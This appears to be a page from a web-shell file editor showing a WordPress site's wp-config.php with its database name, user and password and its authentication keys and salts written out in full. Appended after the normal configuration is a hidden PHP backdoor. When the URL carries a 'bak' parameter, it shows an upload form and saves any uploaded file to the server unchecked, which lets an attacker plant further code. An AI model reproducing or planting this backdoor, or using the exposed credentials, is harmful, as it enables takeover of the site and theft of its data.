Edit file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_ixnpq'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_dp1oe'); /** Database password */ define('DB_PASSWORD', '^EDT2VUX3NXobE6%'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'iW#~/s0yMpT3N|2-*M7bI[o0ZU8lXyl!*(T%_9V93*~o-Au[c3:4K(axtxS8x4@C'); define('SECURE_AUTH_KEY', 'y[:&9+gT!L:i6&8+7(#;ERX:mZMA1@M2@;8HW*LBJ11YDZf*D_2(!S9%J3b]KR1%'); define('LOGGED_IN_KEY', 'DIwB9)A93Tq:4e_7O0S[8%d6n6EYJ!)(F02P9*U)L-m:9zG5_7s%4~%W2;0502gl'); define('NONCE_KEY', '_+*/_F4C#lF-81|-t%7gR1o+tBdLM9Fd)LBA6T69F8@g#Z:Pz3e54(cLHu44|yUs'); define('AUTH_SALT', '0X!1ps|~%[OB(J0Yd~IOHo8;[*DK8Hb1z7V*O]v4v3%JMLx)951F79r62#j35!f:'); define('SECURE_AUTH_SALT', 'n6XkjH6yR2]v:~5sI:FxdNdv|t0M_d;2Gn3|z;X144da5ofqlk3/7;~(-)te3zk4'); define('LOGGED_IN_SALT', '!_Y3it!g25-zF[o]0GTtEed_7b0_3:21a1d[O8w96l):9191)b8j:wlm5c%nk[dx'); define('NONCE_SALT', 'l*3eQB7&%3SEH7D_b3u0!/XU:Jc@~x88yt0S4+DHygBxu88l6iY&|391Jy7X:)L_'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = '4FhMXn3x_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'WP_CACHE_KEY_SALT', '896cdc9545539668a052f8a5d27f76f9' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> Save